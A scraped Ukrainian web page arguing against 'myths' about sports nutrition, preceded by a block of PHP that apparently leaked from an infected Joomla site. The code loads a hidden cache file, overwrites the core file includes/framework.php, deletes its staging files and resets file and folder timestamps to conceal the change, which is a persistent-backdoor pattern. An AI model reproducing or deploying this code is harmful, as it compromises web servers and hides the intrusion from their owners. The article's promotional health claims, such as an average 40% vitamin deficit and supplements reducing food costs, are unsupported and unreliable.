$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Міфи про спортивне харчування | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Міфи про спортивне харчування

Руйнування стереотипів, що склалися про спортивному харчуванні.

З тих пір, як люди свідомо стали на шлях досягнення досконалості тіла, не вщухають суперечки про те, наскільки в цьому необхідно використовувати якісне харчування. У результаті народився міф про те, що спортивне харчування шкідливо для організму.

Досить складно судити про те, що породило цей міф. Швидше за все, некомпетентність тих, хто за родом своєї діяльності зобов'язаний стежити за новітніми технологіями спортивного тренінгу, відновного процесу та продуктів харчування для бодібілдерів - а саме тренерського складу.

МІФ 1 - спортивне харчування нібито продукт "хімічного", ненатурального походження. Насправді ж воно являє собою концентрат звичайного харчування, з якого за допомогою сучасних технологій очищення видалені баластні речовини, а також непотрібні компоненти, які спотворюють структуру раціону, побудованого на звичайної їжі. Крім того, під час фізичних навантажень, тіло інтенсивно витрачає деякі речовини, своєчасне заповнення яких гарантує оптимальне відновлення і фізичну працездатність (амінокислоти комплексні, амінокислоти з розгалуженими ланцюгами, глютамін, протеїн, креатин, так само як і величезна кількість вітамінів і мінеральних речовин). Виділення таких речовин і створений на їх основі якісне спортивне харчування органічного походження стало найбільшим внеском в рекордні спортивні результати у багатьох видах спорту.

МІФ 2 - ніби вживання спортивного харчування створює можливість перевантаження травної та видільної системи людини. Адже не дарма його ще називають "харчовими домішками", це всього лише добавки до грамотно побудованого раціону. Вони служать для того, щоб завдати "остаточну шліфування" вашій харчування, збалансованого на основі основних поживних компонентів.

МІФ 3 - спортивне харчування можна повністю прибрати з раціону, якщо постійно вживати натуральні продукти, такі як, м'ясо, молоко, яйця, овочі, крупи, фрукти і зелень. Однак без харчових добавок дуже складно домогтися збалансованості добового раціону, особливо коли вам, наприклад, необхідно домогтися якісного «рельєфу», тобто досягнення мінімального рівня підшкірного жиру.

Існують певні види спорту, такі як плавання або біг на короткі дистанції, в яких необхідно вживати якісне спортивне харчування для регулювання маси тіла. В даний час людині просто не обійтися без застосування вітамінно-мінеральних комплексів, оскільки їх нестачу в їжі складає в середньому 40%. Тому люди, які займаються напруженою фізичною роботою, просто змушені споживати збалансоване спортивне харчування, щоб домогтися успіхів у своїх починаннях.

Четверта посилка - ніби якісне харчування для спортсменів дуже дорого, і практично недоступне для більшості людей. Зараз практично кожен житель великого міста може знайти тренажерний зал за своїм матеріальним можливостям. Тому залишаються лише витрати на харчування. Але ж якщо замислитися, раціон, до якого включено спортивне харчування, дозволяє знизити витрати на продукти в цілому, а також знизить кількість відвідувань тренажерного залу.


 
Спортивне харчування Міфи про спортивне харчування